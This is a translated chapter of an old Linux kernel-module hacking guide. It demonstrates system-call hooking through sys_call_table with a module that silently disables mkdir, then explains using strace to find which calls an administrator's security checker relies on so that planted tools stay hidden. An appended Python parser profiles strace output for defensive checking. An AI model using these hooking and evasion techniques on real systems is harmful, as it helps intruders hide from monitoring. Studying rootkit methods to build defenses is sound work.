Linux Loadable Kernel Module Complete Guide (II)

Source: Internet
Author: User
   Part 2: Getting better
  
   2.1 How to intercept system calls
  
Now we start getting into LKMs. Normally, LKMs are used to extend the kernel (in particular, as hardware drivers). Our 'hacks' do something different: they intercept system calls and replace them, in order to change how certain system commands behave.
  
The following module makes it impossible for any user to create a directory. It is only a small demonstration of the method we will use from here on.
  
#define MODULE
#define __KERNEL__

#include <linux/module.h>
#include <linux/kernel.h>
#include <sys/syscall.h>     /* SYS_mkdir */
/* only the headers this module needs are listed; the original listing named
   several more. The code is for 2.0/2.2-era kernels, which exported a
   writable sys_call_table */

extern void *sys_call_table[];
/* sys_call_table is exported by the kernel, so we can access it */

int (*orig_mkdir)(const char *path);
/* the original system call */

int hacked_mkdir(const char *path)
{
    return 0;
    /* everything else stays normal; only the new call does nothing and reports success */
}

int init_module(void)
/* module initialization */
{
    orig_mkdir = sys_call_table[SYS_mkdir];
    sys_call_table[SYS_mkdir] = hacked_mkdir;
    return 0;
}

void cleanup_module(void)
/* module cleanup */
{
    sys_call_table[SYS_mkdir] = orig_mkdir;
    /* restore the original mkdir system call */
}
  
Compile and load this module (see 1.1). Then try to create a directory; you will find that it does not succeed. Because the return value is 0 (meaning everything is fine), we get no error message at all. After removing the module, we can create directories again. As you can see, all we need to do to intercept a system call is change the corresponding entry in sys_call_table (see 1.2).
  
The common steps for intercepting a system call are:

Find the entry of the system call in sys_call_table[] (take a look at include/sys/syscall.h).

Save the old entry pointer of sys_call_table[x] (x is the index of the system call you want to intercept).

Store your new function pointer in sys_call_table[x].
  
You will realize that saving the old system call pointer is very useful, because your new call will need it to emulate the original call. When you write a 'hack LKM', the first problem you face is:

Which system call should I intercept?
  
   2.2 Some interesting system calls
  
You are not a kernel god, so you do not know which system calls are used by every user application or command. So here are some tips to help you find the system calls you want to control.
  
Read the sources. On a system like Linux you can find the source code of every program used by any user (or administrator). Once you find a basic function, such as dup, open, write, ...

take a look at include/sys/syscall.h (see 1.2). Try to find the corresponding system call directly (search for dup and you will find SYS_dup; search for write and you will find SYS_write; ...). If you cannot find a direct match:

Some calls, such as socket, send, recv, ..., are not each implemented through a system call of their own, as I said before. Take a look at the header file that contains the relevant system call.
  
Remember that not every function in the C library is a system call; the vast majority of these functions have nothing to do with system calls. A slightly experienced hacker will find the list in 1.2 sufficient. For example, you should know that user ID management is done through the uid system calls. If you really want to be sure, check the source code of the library function or of the kernel.
  
The hardest problem is a system administrator who writes his own programs to check system integrity or security. The problem with these programs is the lack of source code: we cannot determine how the program works or which system calls we would have to intercept to hide our gifts/tools. He may even have installed an LKM of his own that intercepts the system calls hackers commonly use to hide themselves and checks the system's security that way (system administrators often use hacking techniques to protect their systems).
  
So how should we continue?
  
   2.2.1 Discovering interesting system calls (the strace method)
  
Suppose you already know the program the system administrator uses to check the system (you can find this out by other means, such as TTY hijacking (see 2.9 / Appendix A)); now the only problem is keeping your gift away from that program.
  
Well, now run this program under strace (you may need root privileges to execute it):

# strace super_admin_proggy
  
This gives you a great listing of every system call the program makes; these are the system calls you may need to add to your hacking LKM. I do not have such an admin program at hand as an example, but let's look at the output of 'strace whoami':
  
execve("/usr/bin/whoami", ["whoami"], [/* 50 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40007000
mprotect(0x40000000, 20673, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
mprotect(0x8048000, 6324, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
stat("/etc/ld.so.cache", {st_mode=S_IFREG|0644, st_size=13363, ...}) = 0
open("/etc/ld.so.cache", O_RDONLY) = 3
mmap(0, 13363, PROT_READ, MAP_SHARED, 3, 0) = 0x40008000
close(3) = 0
stat("/etc/ld.so.preload", 0xbffff780) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.5", O_RDONLY) = 3
read(3, "\177ELF\1\1\1\0\0\0\0\0\0\0\0\0\3"..., 4096) = 4096
mmap(0, 761856, PROT_NONE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000c000
mmap(0x4000c000, 530945, PROT_READ|PROT_EXEC, MAP_PRIVATE|MAP_FIXED, 3, 0) = 0x4000c000
mmap(0x4008e000, 21648, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED, 3, 0x81000) = 0x4008e000
mmap(0x40094000, 204536, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_FIXED|MAP_ANONYMOUS, -1, 0) = 0x40094000
close(3) = 0
mprotect(0x4000c000, 530945, PROT_READ|PROT_WRITE|PROT_EXEC) = 0
munmap(0x40008000, 13363) = 0
mprotect(0x8048000, 6324, PROT_READ|PROT_EXEC) = 0
mprotect(0x4000c000, 530945, PROT_READ|PROT_EXEC) = 0
mprotect(0x40000000, 20673, PROT_READ|PROT_EXEC) = 0
personality(PER_LINUX) = 0
geteuid() = 500
getuid() = 500
getgid() = 100
getegid() = 100
brk(0x804aa48) = 0x804aa48
brk(0x804b000) = 0x804b000
open("/usr/share/locale.alias", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=2005, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x40008000
read(3, "# Locale name alias data base\n#"..., 4096) = 2005
brk(0x804c000) = 0x804c000
read(3, "", 4096) = 0
close(3) = 0
munmap(0x40008000, 4096) = 0
open("/usr/share/i18n/locale.alias", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/usr/share/locale/de_DE/LC_CTYPE", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=10399, ...}) = 0
mmap(0, 10399, PROT_READ, MAP_PRIVATE, 3, 0) = 0x40008000
close(3) = 0
geteuid() = 500
open("/etc/passwd", O_RDONLY) = 3
fstat(3, {st_mode=S_IFREG|0644, st_size=1074, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) = 0x4000b000
read(3, "root:x:0:0:root:/bin/bash\n"..., 4096) = 1074
close(3) = 0
munmap(0x4000b000, 4096) = 0
fstat(1, {st_mode=S_IFREG|0644, st_size=2798, ...}) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
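Seen from the defensive side, the same strace listing tells the author of an integrity checker which system calls the tool depends on, and therefore which sys_call_table entries a hostile module would have to replace to fool it, so those are the entries worth verifying. The Python below is an added example, not part of the original text: it parses strace records in the format shown above, including the "-1 ENOENT (...)" form and records wrapped after "=" as they are in that listing; the trace it consumes is a constructed sample modelled on the whoami output.

```python
import re
from collections import Counter

# Constructed sample modelled on the 'strace whoami' listing above, not a live
# capture; the mmap record is wrapped after '=' as in that listing.
SAMPLE_TRACE = """\
execve("/usr/bin/whoami", ["whoami"], [/* 50 vars */]) = 0
mmap(0, 4096, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANONYMOUS, -1, 0) =
0x40007000
stat("/etc/ld.so.preload", 0xbffff780) = -1 ENOENT (No such file or directory)
open("/lib/libc.so.5", O_RDONLY) = 3
geteuid() = 500
getuid() = 500
open("/usr/share/i18n/locale.alias", O_RDONLY) = -1 ENOENT (No such file or directory)
open("/etc/passwd", O_RDONLY) = 3
read(3, "root:x:0:0:root:/bin/bash\\n"..., 4096) = 1074
close(3) = 0
"""

# One strace record: name(args) = result [ERRNO (description)]
RECORD_RE = re.compile(r'^(?P<name>[a-z0-9_]+)\((?P<args>.*)\)\s*=\s*(?P<ret>-?\w+)'
                       r'(?:\s+(?P<err>E[A-Z0-9]+))?')

def join_wrapped(text):
    """Re-join records split after '=' or ',' by a pager or copy-paste."""
    records, pending = [], ''
    for line in (ln.strip() for ln in text.splitlines() if ln.strip()):
        pending = f'{pending} {line}' if pending else line
        if pending.endswith(('=', ',')):
            continue                 # the value continues on the next line
        records.append(pending)
        pending = ''
    if pending:                      # a truncated final record is kept as-is
        records.append(pending)
    return records

def parse_strace(text):
    """List of (syscall, args, result, errno-or-None) for every parsable record."""
    matches = (RECORD_RE.match(r) for r in join_wrapped(text))
    return [(m['name'], m['args'], m['ret'], m['err']) for m in matches if m]

def syscall_profile(text):
    """How often each call is made: the sys_call_table entries the program relies on."""
    return Counter(name for name, _, _, _ in parse_strace(text))

def opened_paths(text):
    """(path, succeeded) for each open(); the path is open()'s first, quoted argument."""
    return [(args.split(',', 1)[0].strip().strip('"'), err is None)
            for name, args, _, err in parse_strace(text) if name == 'open']
```

Run against a real capture, syscall_profile() lists exactly the table entries the traced checker would be blind to if they were replaced, which is the list to compare against a known-good copy.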
  